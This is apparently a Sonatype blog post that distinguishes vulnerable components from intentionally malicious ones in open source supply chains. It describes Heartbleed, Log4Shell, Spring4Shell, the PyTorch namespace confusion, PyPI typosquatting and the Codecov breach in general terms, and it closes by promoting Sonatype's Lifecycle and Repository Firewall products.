As evidenced by the ongoing evolution of cyber attacks, vulnerabilities and malware in open source software stand out as formidable challenges to the security and integrity of your software supply chain.
At first glance, these two terms might appear almost interchangeable, but their distinctions are fundamental. They represent two distinct yet related aspects of cybersecurity.
Additionally, modern usage of each term frequently emerges as overly simplistic or overtly incorrect, especially in the context of software supply chains. "Vulnerabilities" are not threats — but they can be exploited by threat actors. “Malware” is not synonymous with "virus" — but it does involve intent to do harm.
In the context of open source software and for the scope of this blog post, we define the following:
Vulnerabilities: Vulnerable components that can be exploited.
Malware: Intentionally malicious components that can insert harmful code into projects and ecosystems.
As open source software comprises up to 90% of modern software, knowledge of vulnerable components and intentionally malicious components and nuances therein remain important to not only developers but also DevOps and security teams as well.
This blog post sheds light on the disparities between these terms, highlighting their unique characteristics, means of exploitation, and impact in open source software.
A vulnerable component is akin to a flaw in code, much like a faulty lock on a door. Vulnerable components are not created with malicious intent but are inherent weaknesses in software supply chains.
Vulnerable components can exist in various software elements, such as:
operating systems
applications
libraries
plugins
Just as a faulty lock compromises the security of a building by allowing unauthorized access, a vulnerable component creates an entry point for attackers to exploit, potentially leading to unauthorized access to a system, application, or component.
Much like how an intruder can bypass a faulty lock to enter a building without a key, threat actors exploit vulnerable components to compromise the software. This exploitation can result in severe consequences, such as surreptitious data access, injection of malicious code, or disruption of the software's intended functionality.
Typically, vulnerable components originate from coding errors, design flaws, or inadequate security measures during software development. Once identified, a vulnerability typically receives a special identifier number from the Common Vulnerabilities and Exposures (CVE) program. This CVE number serves as a shorthand reference for tracking and discussing the vulnerability.
Efficiently identifying and addressing vulnerable components is crucial to ensure the security and reliability of your software supply chain and protect against potential breaches.
Below we cover a few real-life examples that originated from vulnerable components.
Heartbleed (CVE-2014-0160) was a critical vulnerability discovered in the OpenSSL cryptographic software library in April 2014. Threat actors exploited a vulnerable component in the implementation of the Transport Layer Security (TLS) Heartbeat extension, potentially exposing sensitive information like usernames, passwords, and private encryption keys.
The Heartbleed vulnerability affected a vast amount of web servers and required prompt patching for mitigation.
The Log4Shell vulnerability (CVE-2021-44228) affected a widely used open source logging library called Log4j. Threat actors took advantage of a vulnerable component by sending specially crafted log messages, which allowed them to remotely execute malicious code.
This vulnerability greatly affected and continues to affect many organizations across the world. It highlighted the need for quick action and constant vigilance to address vulnerabilities, even in trusted libraries.
Another notable vulnerability (CVE-2022-22965) targeted the popular Spring Framework used in Java applications. Spring4Shell was a zero-day vulnerability, meaning that threat actors exploited a vulnerable component before a fix was even available.
This incident illustrated the importance of staying updated with the latest security patches and being aware of evolving threats in open source components.
Intentionally malicious components pose a significant threat to software supply chains and open source ecosystems. They encompass a wide range of malicious programs, such as viruses, worms, trojans, ransomware, spyware, and adware, all designed to gain unauthorized access to information or systems.
With myriad formats, intentionally malicious components target and compromise developer infrastructure, allowing threat actors to steal data, install harmful software, gain control of a network, or compromise software or hardware.
Oftentimes intentionally malicious components appear legitimate but actually contain harmful code. Developers unknowingly download these components not realizing how they could compromise their software supply chains.
Unlike vulnerabilities, tracking and mitigating intentionally malicious components can be challenging since they are often distributed through public package repositories and may not receive a CVE number, which makes it difficult to fully understand the extent of a threat and how to protect any potentially affected systems.
Below we cover a few examples of software supply chain exploits that leverage intentionally malicious components to cause harm.
Namespace confusion is a malicious tactic in which attackers upload packages with the same name as internal packages to a public package repository, typically assigning a higher version number than what has been published within an organization's internal repository. The primary objective of this strategy is to deceive package managers into retrieving the highest version of the package from the public repository rather than from the secure internal one. This exploit leverages a widespread practice of utilizing version ranges instead of specifying precise version numbers in project manifests.
In December 2022, PyTorch experienced a namespace confusion attack employed to target users of the PyTorch-nightly build. Attackers registered a package with a higher version on PyPI, exploiting the absence of namespace protection. When Python resolved dependencies, the attacker's intentionally malicious components took precedence, leading to data theft. PyTorch renamed and reserved the component name to prevent further exploitation. This incident underscores the need for stronger namespace and package name safeguards in upstream registries and highlights the importance of proactive supply chain management.
Typosquatting is a social engineering strategy for executing software supply chain attacks, relying on a deceptively straightforward technique. The approach involves choosing a popular component, subtly misspelling its name, and banking on the likelihood that developers will make typographical errors when adding a component and unknowingly downloading the threat actor’s intentionally malicious component instead of the legitimate one. Additionally, there's a related variation known as "brandjacking," where the attacker closely spoofs a well-known brand to lure developers into unintentionally incorporating these packages instead of the legitimate components they were expecting.
A PyPI incident in August 2022 highlights the danger of typosquatting, where intentionally malicious Python packages impersonated legitimate ones. In this case, ransomware-laden packages masqueraded as "Requests," targeting developers who mistyped the library name. The ransomware encrypts files but offers decryption keys without a ransom demand, blurring the line between ethical and malicious intent.
Malicious code injection is a targeted attack that poses a significant threat to developers using open source components. In this tactic, a threat actor compromises a known legitimate open source package by introducing intentionally malicious components into its repository. This infiltration occurs either through a compromise or by impersonating a trustworthy open source committer. The attacker disguises the intentionally malicious payload within seemingly harmless code changes, distributing it to users of the library and carrying out their nefarious objectives.
The Codecov incident in April 2021 serves as an example of malicious code injection. Exploiting an error in Codecov's Docker image creation process, threat actors tampered with the Bash Uploader script, allowing potential data exfiltration from customers' continuous integration environments. Remarkably, this breach remained undetected for over two months. The attackers subtly replaced Codecov's server IP address in the script, diverting system environment variables, including sensitive API keys and credentials, to their own IP address. This case underscores the gravity of malicious code injection and the imperative for heightened software supply chain security.
While vulnerable and intentionally malicious components share a connection as security risks, knowing the difference is critical to effectively managing your open source components and protecting your software supply chain.
Sonatype Lifecycle focuses on vulnerability management throughout the software development lifecycle (SDLC). It integrates seamlessly into your development environment, enabling early detection of vulnerable components. With continuous monitoring and policy enforcement, Lifecycle helps prevent the incorporation of unapproved components, promotes secure coding practices, and enables you to fix open source vulnerabilities across your SDLC.
Sonatype Repository Firewall acts as a first line of defense that prevents intentionally malicious components from ever entering your software supply chain. It automatically blocks malicious packages from gaining access to your systems, significantly reducing the risk of compromise and data breaches. With its advanced threat intelligence, it stays up-to-date with the latest malware signatures, providing proactive protection against emerging threats.
With Sonatype Repository Firewall and Sonatype Lifecycle, you defend against the ever-present threats posed by vulnerable and intentionally malicious components to ensure the security and reliability of your software supply chain. By prioritizing software security and adopting the right tools, you can confidently deliver secure applications to your users, mitigating the risk of breaches and preserving your organization's reputation.